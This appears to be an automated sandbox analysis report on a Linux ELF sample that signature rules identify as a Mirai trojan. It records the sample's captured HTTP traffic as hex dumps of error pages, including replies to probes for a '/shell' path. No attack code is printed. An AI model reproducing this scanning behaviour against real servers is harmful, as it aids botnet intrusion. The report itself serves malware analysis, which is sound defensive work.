      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:32:37 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 14:32:37 GMTServer: ApacheVary: Accept-EncodingContent-Length: 262Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Fri, 26 Jan 2024 14:34:37 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:32:41 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: closeContent-Type: text/html; charset=utf-8Content-Length: 337Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 36 22 3e 3c 74 69 74 6c 65 3e 4e 54 4c 34 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 31 30 2e 31 30 2e 33 34 2e 33 36 2f 3f 74 79 70 65 3d 49 6e 76 61 6c 69 64 20 4b 65 79 77 6f 72 64 26 70 6f 6c 69 63 79 3d 4d 61 69 6e 50 6f 6c 69 63 79 20 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 31 30 30 25 3b 20 68 65 69 67 68 74 3a 20 31 30 30 25 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 20 6d 61 72 67 69 6e 77 69 64 74 68 3d 22 30 22 20 6d 61 72 67 69 6e 68 65 69 67 68 74 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 76 73 70 61 63 65 3d 22 30 22 20 68 73 70 61 63 65 3d 22 30 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1256"><title>NTL4</title></head><body><iframe src="http://10.10.34.36/?type=Invalid Keyword&policy=MainPolicy " style="width: 100%; height: 100%" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" vspace="0" hspace="0"></iframe></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 26 Jan 2024 14:32:42 GMTContent-Type: text/htmlContent-Length: 3798Connection: keep-aliveETag: "607d55d7-ed6"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 35 46 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 42 32 33 33 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 42 32 33 33 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 36 39 44 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.12.2Date: Fri, 26 Jan 2024 14:32:50 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.12.2</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jan 2024 14:32:50 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 14:32:53 GMTServer: Apache/2.2.6 (Unix) DAV/2 mod_ssl/2.2.6 OpenSSL/0.9.8e PHP/5.2.4 mod_apreq2-20051231/2.5.7 mod_perl/2.0.2 Perl/v5.8.7Content-Length: 373Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 36 20 28 55 6e 69 78 29 20 44 41 56 2f 32 20 6d 6f 64 5f 73 73 6c 2f 32 2e 32 2e 36 20 4f 70 65 6e 53 53 4c 2f 30 2e 39 2e 38 65 20 50 48 50 2f 35 2e 32 2e 34 20 6d 6f 64 5f 61 70 72 65 71 32 2d 32 30 30 35 31 32 33 31 2f 32 2e 35 2e 37 20 6d 6f 64 5f 70 65 72 6c 2f 32 2e 30 2e 32 20 50 65 72 6c 2f 76 35 2e 38 2e 37 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.6 (Unix) DAV/2 mod_ssl/2.2.6 OpenSSL/0.9.8e PHP/5.2.4 mod_apreq2-20051231/2.5.7 mod_perl/2.0.2 Perl/v5.8.7 Server at 127.0.0.1 Port 80</address></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 26 Jan 2024 14:32:58 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:58 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveKeep-Alive: timeout=60Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:58 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:32:58 GMTContent-Type: application/javascriptContent-Length: 7Connection: keep-aliveKeep-Alive: timeout=70ETag: "6391c47d-7"Data Raw: 2f 2f 21 21 21 0a 0a Data Ascii: //!!!
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:33:00 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:33:01 GMTContent-Type: text/htmlContent-Length: 3212Connection: keep-aliveKeep-Alive: timeout=20Vary: Accept-EncodingETag: "608a73a9-c8c"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 74 79 6c 65 3e 2e 63 65 6e 74 65 72 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 65 6e 74 65 72 3a 6c 61 6e 67 28 7a 68 2d 54 57 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 4d 69 63 72 6f 73 6f 66 74 20 4a 68 65 6e 67 48 65 69 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 65 6e 74 65 72 3a 6c 61 6e 67 28 7a 68 2d 43 4e 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 65 6e 74 65 72 3a 6c 61 6e 67 28 6a 61 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 4d 65 69 72 79 6f 2c 73 61 6e 73 2d 73 65 72 69 66 7d 2e 63 69 72 63 6c 65 5f 74 65 78 74 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 36 30 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 38 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 7d 2e 74 6f 70 7b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 34 30 25 20 2d 20 31 34 30 70 78 29 7d 2e 62 6f 74 74 6f 6d 7b 68 65 69 67 68 74 3a 31 35 30 70 78 3b 68 65 69 67 68 74 3a 63 61 6c 63 28 36 30 25 20 2d 20 32 31 30 70 78 29 7d 2e 63 65 6e 74 65 72 7b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 63 69 72 63 6c 65 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 77 69 64 74 68 3a 32 36 30 70 78 3b 68 65 69 67 68 74 3a 32 36 30 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 63 30 63 36 63 63 7d 2e 63 69 72 63 6c 65 5f 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 70 78 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 63 6f 6c 6f 72 3a 23 34 31 34 62 35 35 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 6c 65 5f 74 65 78 74 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 22 20 69 64 3d
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jan 2024 14:33:01 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 26 Jan 2024 14:33:02 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 268Expires: Fri, 26 Jan 2024 14:33:02 GMTDate: Fri, 26 Jan 2024 14:33:02 GMTConnection: keep-aliveData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 44 4e 53 20 66 61 69 6c 75 72 65 3c 2f 48 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 20 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 0a 6c 61 74 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 31 26 23 34 36 3b 61 37 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 36 32 37 39 35 38 32 26 23 34 36 3b 39 39 64 35 36 32 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Service Unavailable</TITLE></HEAD><BODY><H1>Service Unavailable - DNS failure</H1>The server is temporarily unable to service your request. Please try againlater.<P>Reference&#32;&#35;11&#46;a7b0f748&#46;1706279582&#46;99d5622</BODY></HTML>
      Source: Cm1FNv3k5V.elf, 6229.1.0000000008048000.000000000805a000.r-x.sdmp, Cm1FNv3k5V.elf, 6231.1.0000000008048000.000000000805a000.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: Cm1FNv3k5V.elf, 6229.1.0000000008048000.000000000805a000.r-x.sdmp, Cm1FNv3k5V.elf, 6231.1.0000000008048000.000000000805a000.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
      Source: Cm1FNv3k5V.elfString found in binary or memory: http://upx.sf.net
      Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443

      System Summary

      barindex
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_268aac0b Author: unknown
      Source: 6231.1.0000000008048000.000000000805a000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0cb1699c Author: unknown
